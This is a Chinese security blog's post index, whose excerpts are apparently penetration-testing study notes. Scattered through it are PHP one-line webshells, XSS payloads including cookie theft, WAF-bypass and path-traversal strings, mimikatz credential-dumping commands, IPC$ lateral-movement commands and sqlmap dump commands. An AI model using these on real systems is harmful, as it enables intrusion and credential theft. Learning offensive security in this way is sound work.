自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(63)
  • 收藏
  • 关注

原创 应急响应

6.1 首先找到项目的进程号 ps aux |grep python,然后进入/proc/进程号查看即可。(4)抓取目的地址包含是192.168.1.100的包,并将结果保存到 result.cap 文件中。(3)抓取地址包含是192.168.1.100的包,并将结果保存到 result.cap 文件中。(2)抓取源地址是192.168.1.100的包,并将结果保存到 result.cap 文件中。(1)抓取所有的经过eth0网卡的网络包,并存到 result.cap 文件中。5、根据PID定位程序目录。

2024-02-26 19:27:53 529

原创 流量特征

site:xxx.com -www

2024-02-02 16:32:42 377

转载 【SDL实践指南】人工代码审计思路

部分我们通常会使用代码审计工具对源代码进行安全扫描并对扫描结果进行审核从而筛选出其中存在的安全问题并以安全单的形式提交给研发人员进行修复,代码审计工具的好处在于快速全量,但是也会存在很多的误报和漏报问题,故而部分企业在有时间的情况下还会采用人工审核的方式对源代码进行二次安全审计,但是人工审计也存在一个普遍的安全问题就是耗时长且难以保证代码的完全覆盖。审计人员可以通过对项目代码中存在的不安全编码和使用不安全函数进行检索来查找存在的常见风险,例如:OWASP TOP 10漏洞。

2024-01-18 17:05:38 71

转载 navicat虚拟键设置

5、 replace(json_extract(`data`,'$.name'),'"','') 使用 mysql 函数 提取出 指定json 格式字段内的 数值。{"sex": "男", "name": "张三", "phone": 134000000000}7、无 引号的 则可以使用 json_extract(`data`,'$.phone')3、给 data 字段 写入一段 json 格式数据。4、设置 v_name ,v_phone 虚拟键字段。2、设置 data 字段 json 类型。

2024-01-18 10:37:16 163

原创 java安全-jwt

jwt数据格式:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.he0ErCNloe4J7Id0Ry2SEDg09lKkZkfsRiGsdX_vgEg。无验证base64解密改加密方式为空,none,[]第一部分:头部,第二部分:相关内容,第三部分:密钥。预编译注入cookie注入。需要有under by语句。有验证码只能爆破密钥。

2023-11-22 22:13:46 67

原创 kuburnetes六大组件

6.kubectl:在master节点上,敲打的命令,就和docker命令一样,客户端命令。2.api-server:k8s作为一个高级的容器管理平台,对每一个发来的请求都要进行验证,该请求是否被集群允许,删除集群中的一个容器组,是否被允许。k8s默认运行后,6个组件每一个组件的请求,与相应,都要经过这个api-server组件检验。1.etcd:k8s内部运行组件,存储所有节点的信息,节点上部署的容器信息等都存在数据库,key-value redis一个用法,etcd。拉取镜像,运行容器。

2023-10-12 20:08:48 77

原创 kali开启ssh服务

我的Kali的局域网IP地址为192.168.200.140。选择合适的终端连接软件,本次使用Xshell用作测试.将配置文件的第32行、37行的注释取消。首先查看Kali的局域网IP地址。打开Kali ssh配置文件。2.Xshell连接Kali。在Xshell中输入。

2023-10-11 15:47:21 567

原创 docker部署与使用

安装dockersudo apt-get install docker docker-compose -y或sudo apt-get install docker.io。#安装完成之后, docker就自动启动了systemctl status docker。#查看docker版本docker -v。#查看docker里面容器的日志。#添加docker的apt源。#查看运行的docker容器。#查看启动的docker容器。#查看本地docker镜像。#查看docker详细信息。#查看docker版本。

2023-10-10 20:53:39 56

原创 SQL注入杂记

MYSQL5.0以上版本中,MySQL存在一个自带数据库名为information_schema,它是一个存储记录所有数据库名,表名,列名的数据库。数据库中符合“.”代表下一级,如data1.user表示data1数据库下的user表名。在参数值后加入错误的参数,看页面是否正常,如果正常说明不存在注入点,如果跳转说明做了过滤。information_schema.columns:记录所有列名信息的表。information_schema.tables:记录所有表名信息的表。1 and 1=1正常。

2023-09-22 18:34:42 34

原创 内网横向移动

2.SPN服务-探针,请求,导出,破解,重写。1.mimikatz域横向移动RDP传递。

2023-09-20 00:19:58 41

转载 网络安全笔记

9、.php5等绕过黑名单-- 前提条件 httpd.conf--》 AddType application/x-httpd-php .php .phtml .phps .php5 .pht。靶场---dvwa,皮卡丘,bwapp,sqli-labs,upload-labs,xss小游戏,xxe-labs,wargames,metasploitables,hackthebox。----sqlmap 自写python脚本。

2023-09-19 22:42:10 339

转载 google hack搜索语法

google hack

2023-09-19 21:55:56 76

原创 绕过waf的方式

过滤关键词: and, or, union, where, limit, group by, select被拦截的语句: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1bypass语句: 1 || 1 = 1 into outfile 'result.txt'混淆: http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?

2023-09-08 01:00:15 4943

原创 mimikatz使用

需要HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest的"UseLogonCredential"设置为1,类型为DWORD 32才可以,然后下次用户再登录,就能记录到明文密码了。默认配置是抓不到明文密码了,神器mimikatz显示Password为null。第二条:sekurlsa::logonpasswords。第一条:privilege::debug。

2023-09-07 09:42:16 259

原创 kali_nmap命令

模糊测试的脚本,发送异常的包到目标机,探测出潜在漏洞 intrusive:入侵性的脚本,此类脚本可能引发对方的IDS/IPS的记录或屏蔽。-P:指定要扫描的端口,可以是一个单独的端口,用逗号隔开多个端口,使用“-”表示端口范围;选项表示以一种易于检索的格式记录信息,即每台主机都以单独的行来记录所有信息。nmap的脚本默认目录为:/usr/share/nmap/scripts/-e:在多网络接口Linux系统中,指定扫描使用的网络接口;使用-sC或-A选项扫描时候默认的脚本,提供基本脚本扫描能力。

2023-09-07 09:41:10 659

原创 一句话木马

<?php @eval($_POST['pass']);><?php @assert($_POST['pass']);>system($_REQUEST['CMD']);

2023-09-06 00:43:28 29

转载 信息收集(详细使用工具)

C段指的是同一内网段内的其他服务器,每个IP有ABCD四个段,举个例子,192.168.0.1,A段就是192,B段是168,C段是0,D段是1,而C段嗅探的意思就是拿下它同一C段中的其中一台服务器,也就是说是D段1-255中的一台服务器,然后利用工具嗅探拿下该服务器。信息收集是信息得以利用的第一步,也是关键的一步。可以通过在线工具查询:比如站长工具查询 (http://whois.chinaz.com/),阿里云域名信息查询:https://whois.aliyun.com 以及kali自带的工具。

2023-09-06 00:42:57 47

原创 信息收集2

2)Whois信息收集与利用。3)真实IP收集与利用。4)旁站C段收集与利用。5)端口开放收集与利用。6)网站指纹收集与利用。7)目录接口收集与利用。1)子域名收集与利用。

2023-09-06 00:41:52 31

原创 xss2-

tar-zxvf解压缩。tar-zcvf压缩。

2023-09-06 00:41:22 36

原创 文件上传+包含

4、尽量不要使用动态包含,可以在需要包含的页面固定写好,如:“include("head.php")”。2、路径限制,限制被包含的文件只能在某一个文件夹内,特别是一定要禁止目录跳转字符,如:“../”。5、可以通过调用str_replace()函数实现相关敏感字符的过滤,一定程度上防御了远程文件包含。3、基于白名单的包含文件验证,验证被包含的文件是否在白名单中。1、严格判断包含中的参数是否外部可控。

2023-09-06 00:40:13 67

原创 文件包含漏洞+图片马

本地文件包含用../返回上层目录的方式访问本地文件。远程文件包含用url地址来指向需要访问的文件。

2023-09-06 00:39:34 44

转载 xss构造

<a xlink:href=javascript:alert(1)>点我

2023-09-06 00:38:44 87

原创 渗透流程-

常用漏洞扫描工具,如burpsuite/AWVS/APPscan/OWASP-ZAP/Nessus等,另外可以通过一些方法进行漏洞探测,如SQL注入、文件上传、文件包含、命令执行、XSS跨站脚本、CSRF跨站请求伪造、弱口令等。linux下linux内核版本漏洞提权, sudo su提权,mysql system提权、oracle低权限提权以及linux脏牛提权等。windows下windows低版本漏洞提权, serv-u提权, mysql的udf提权等。6)总结报告及修复方案。

2023-09-06 00:37:13 25

原创 目录遍历与文件包含

目录遍历是可以读取web目录以外的其他目录,根源在于对路径访问权限设置不严格,针对本系统。文件包含是利用函数来包含web目录以外的文件,分为本地包含和远程包含。目录遍历也能去执行php文件,和其他的文件,有文件包含的作用。

2023-09-06 00:36:30 113

原创 利用搜索引擎收集信息

site:xxx.com intext:管理|后台|登陆|用户名|密码|系统|账号。site:xxx.com intitle:管理|后台|登陆。

2023-09-06 00:35:39 26

原创 java危险函数

日志输出,可造成信息泄露的风险。最后再给大家介绍以下。

2023-09-06 00:34:49 307

原创 xss构造

把value值闭合,创建一个新的type值,再创建一个事件:t_sort="type="text"onclick="alert(123)"-->对"和:符号也进行转html编码处理:javascript:alert("http://")双写绕过:<SCRscriptIPT>alert(/pig/)</SCRscriptIPT>标签法:"><a href="javascript:alert('abc')">//大小写法:"><SCRIPT>alert(123)</SCRIPT>

2023-09-06 00:34:05 24

原创 xss-1

script>alert(document.cookie)</script>弹cookie。

2023-09-06 00:33:33 25

原创 windows添加管理员+信息收集

6、局域网中的域的信息-net view /domain。端口:80HTTP、3306MySQL、3389RDP。5、局域网中公开的文件共享-net view。3、开放的端口信息-netstat -an。2、ip信息-ipconfig/all。4、运行的进程信息-tasklist。1、系统信息-systeminfo。

2023-09-06 00:32:44 109

原创 SQLmap简单使用

python sqlmap.py -r "D:\post.txt" -D 数据库名 -T 表名 -C 字段名 --dump。python sqlmap.py -r "D:\post.txt" -D 数据库名 -T 表名 --columns。python sqlmap.py -r "D:\post.txt" -D 数据库名 --tables。sqlmap.py -u 网址 -D 数据库名 -T 表名 -C 字段名 --dump。sqlmap.py -u 网址 -D 数据库名 -T 表名 --columns。

2023-09-06 00:27:23 25

原创 SQL盲注

---------------------------------------------------------------------数字型盲注--------------------------------------------------------------------------------------------------------------------------------字符型盲注-----------------------------------------------

2023-09-05 01:48:16 111

原创 mysql语法

select host,user,password from test1.user where user ="root" and host ="localhost" #加上条件。alter table test1.user add name char(20) after num #在test1库中的user表中建立name表,并且在num后。creat table test1.user(num int,primary key(num)) #在test1库中建立user表。

2023-09-05 01:47:34 13

原创 kali文件共享

每次进入kali操作系统,运行命令vmhgfs-fuse .host:/ /mnt/hgfs -o subtype=vmhgfs-fuse,allow_other。接着,就会在/mnt/hgfs/里面看到本地共享文件夹的内容。python -m http.server 8000(可用)

2023-09-05 01:47:00 410

原创 HTTP常见状态码

状态码【200】表示【请求成功】,一般在GET和POST请求中可以见到;状态码【404】表示【服务器找不到客户端所请求的资源(网页)】;状态码【403】表示【服务器拒绝执行客户端的请求】;状态码【304】表示【所请求的资源并未修改】;状态码【500】表示【服务器内部错误】。状态码【302】表示【资源临时移动】;

2023-09-05 01:45:52 18

原创 越权漏洞-

当验证成功后,跳到第二步,输入新密码,很多程序会在这一步不再验证用户身份,导致恶意攻击者抓包直接修改参数值,导致可修改任意用户密码。很多网站的下载功能,一些被下载的静态文件,例如pdf、word、xls等,可能只有付费用户或会员可下载,但这些文件的URL地址泄露后,任何人都可下载,如果知道URL命名规则,则会遍历服务器的收费文件进行批量下载。这种通过修改一下参数就可以产生水平越权,例如查看用户信息页面URL后加上自己的ID便可查看,当修改为他人的ID号时会返回他人的信息,便产生了水平越权。

2023-09-05 01:44:40 25

原创 域名信息收集

域名介绍:域名英文全称是Domain name,它由一串用点分割的名字组成,是Internet上某一台计算机或者是计算机组的名称,主要是用于在数据传输时标识计算机的电子方位。whatweb工具是kali自带一个工具,是一款专门用来扫描网站使用技术的工具,可以用来识别网站使用的 CMS、Web 服务器、Web 应用程序框架、Web 服务器版本以及其他技术。target website 为要扫描的目标网站地址,可以是ip,也可以是域名。whois指的是域名注册时留下的信息,比如留下的管理员姓名、电话、邮箱。

2023-09-05 01:44:08 37

原创 文件上传绕过

通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特点的用户或目录的访问、禁止目录列表、配置默认文档等功能。在Nginx的服务器环境下,假如成功上传一张名为test.jpg的文件,如果我们访问/test.jpg/test.php这个虚构的目录时服务器会直接test.jpg作为php文件去解析。*.asa、*.asp格式的文件夹是其目录下的文件都会当做asp文件解析。.user.ini文件的意思是:所有的php文件都自动包含指定的文件。

2023-09-05 01:43:23 139

原创 文件包含-

可以访问本地的文件(通过指定末尾的文件,可以读取经base64编码后的文件源码,之后再base64解码一下就行)这个协议的利用方法是 将要执行的语法php代码写在post中提交,不用键与值的形式,只写代码即可。php://filter/resource=../key.php #php文件包含。

2023-09-05 01:42:38 18

原创 内网渗透—域横向移动

建立IPC连接:net use \\ip地址\ipc$ "password" /user:"administrator"③.查看目标时间,创建计划任务(at、schtasks)定时执行拷贝到的脚本。windows两种命令行创建计划任务:at和schtasks。通过IPC传文件:copy 文件名 \\IP地址\目录$断开IPC连接:net use \\IP地址 /del。查看对方电脑时间:net time \\IP地址。定时运行程序:at \\IP地址 时间 文件名。①.建立IPC链接到目标主机。

2023-09-05 01:41:24 38

原创 免杀木马制作

其功能是对攻击载荷文件进行重新的排列编码,改变可执行文件中的代码形状,避免被杀软认出。MSF 编码器可以将原可执行程序重新编码,生成一个新的二进制文件,这个文件运行以后,MSF 编码器会将原始程序解码到内存中并执行。upx 打包器的原理非常简单,就是将可执行文件中的代码和数据进行压缩,然后将解压缩用的代码附加在前面,运行的时候先将原本的可执行数据解压出来,然后再运行解压缩后的数据。打包器的本质目的是反调试,防止逆向工程,而这里使用打包器的目的是为了改变后门程序的特征码。#设置对应的payload。

2023-09-05 01:39:46 200

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除